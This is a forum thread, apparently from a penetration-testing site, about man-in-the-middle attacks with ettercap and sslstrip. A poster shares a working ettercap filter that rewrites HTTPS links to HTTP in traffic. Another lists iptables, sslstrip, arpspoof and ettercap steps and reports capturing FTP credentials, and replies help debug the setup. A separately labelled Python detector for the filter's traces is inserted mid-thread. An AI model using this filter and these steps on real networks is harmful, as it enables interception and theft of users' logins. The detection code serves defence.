http://www.pentestit.com/update-ettercap-074/
There you go. Don't know why I associated that with MS. I guess I got confused somewhere in my RSS feed.
Running both KDE and GNOME BT5 flawlessly. Thank you !
An alternative to using sslstrip with ettercap. This ettercap filter (https downgrade) works.
Code:
##########################
## Zap Content Encoding ##
##########################
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      # note: replacement string is same length as original string
      msg("[HTTP Response Filter] Encoding zapped.\n");
   }
}

#####################
## Replace Content ##
#####################

##
# Requests
if (ip.proto == TCP && tcp.dst == 80) {
   # msg("[HTTP Response Filter] HTTP request seen.\n");
   if (search(DECODED.data, "https")){
      replace("https", "http");
      msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
   }
   if (search(DATA.data, "https")){
      replace("https", "http");
      msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
   }
}

##
# Response
if (ip.proto == TCP && tcp.src == 80) {
   # msg("[HTTP Response Filter] HTTP response seen.\n");
   if (search(DECODED.data, "https")){
      replace("https", "http");
      msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
   }
   if (search(DATA.data, "https")){
      replace("https", "http");
      msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
   }
}
@DeserTEagLe Good work there on that filter. Quick question, what happens if the server doesn't accept the downgrade, is the user prevented from hitting the HTTPS site?
Meaning, when SSLStrip & Ettercap work together, if sslstrip can't downgrade to http, traffic still passes over 443 and the victim is presented with the ettercap certificate to accept. Does this work the same way?
It seems the traffic would be blocked to https. So http sites that redirect to https automatically may end up in an infinite loop.
What do you think?
Sometimes you may have to comment one leg (request / response) out of the filtering or you will get redirection loops (like while tampering Facebook connections). Also, if the request is already under https, you won’t be able to filter it.
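Added example, not code from any poster in this thread: a server-side check for two side effects of the filter posted above, the rewritten `Accept-Rubbish!` request header and the repeated plain-HTTP requests that the redirect loop discussed above produces. It assumes a site whose port-80 listener answers every request with a redirect to HTTPS; the function names, the threshold and the sample requests are constructed for illustration.

```python
# Added example, not from the thread. All sample requests are constructed.
from collections import Counter, defaultdict

MANGLED_HEADER = "accept-rubbish!"  # header name the posted filter writes

def parse_request(raw):
    """Return (method, path, headers) for one HTTP/1.x request, or None if malformed."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers

def find_downgrade_signs(requests, loop_threshold=3):
    """requests: (client_ip, raw_bytes) pairs seen on a port-80 listener that
    answers every request with a redirect to HTTPS (assumption of this example).
    Returns {client_ip: set of findings}."""
    findings = defaultdict(set)
    hits = Counter()
    for ip, raw in requests:
        parsed = parse_request(raw)
        if parsed is None:
            continue
        _, path, headers = parsed
        # The filter renames Accept-Encoding so responses arrive uncompressed.
        if MANGLED_HEADER in headers:
            findings[ip].add("mangled-accept-encoding")
        # A client whose redirect target is rewritten back to http keeps
        # re-requesting the same path here instead of moving to port 443.
        hits[(ip, path)] += 1
        if hits[(ip, path)] >= loop_threshold:
            findings[ip].add("redirect-loop:" + path)
    return dict(findings)

def _req(path, encoding_header):
    return ("GET %s HTTP/1.1\r\nHost: shop.example\r\n%s: gzip, deflate\r\n\r\n"
            % (path, encoding_header)).encode("latin-1")

SAMPLE = [("192.0.2.10", _req("/login", "Accept-Rubbish!"))] * 3 + [
    ("192.0.2.77", _req("/login", "Accept-Encoding")),
]

if __name__ == "__main__":
    for ip, reasons in find_downgrade_signs(SAMPLE).items():
        print(ip, sorted(reasons))
```

The loop counter here runs over the whole batch; a deployed version would count within a short time window per client.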
Hello everyone,
For some reason I can't seem to get this working.
I am running BT5R2, I edit my /etc/etter.conf file.
Enter this ip route line: "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000"
I start sslstrip -a -k -f
use arpspoof
run ettercap (version 0.7.4.1)
set ip_forward to 1
When I test it with my test PC and I go to an FTP server it works, I get the username\pw
but when I go to mail.google.com or paypal.com I get an SSL error site.
1 thing I notice is when I do iptables -L I see 3 chains (input\forward\output) nothing more.
Any advice would be appreciated!
Why are you running ettercap & Arpspoof? Ettercap can do MiTM. Also, to ensure ettercap is using the proper conf file I use the -a switch (-a /etc/etter.conf) just to be sure.
What browser are you using? It seems chrome has extra security measures to protect against MiTM in my experience.
Here's what I would do, make sure you installed easy-creds during the R2 upgrade and then use that to see if it works.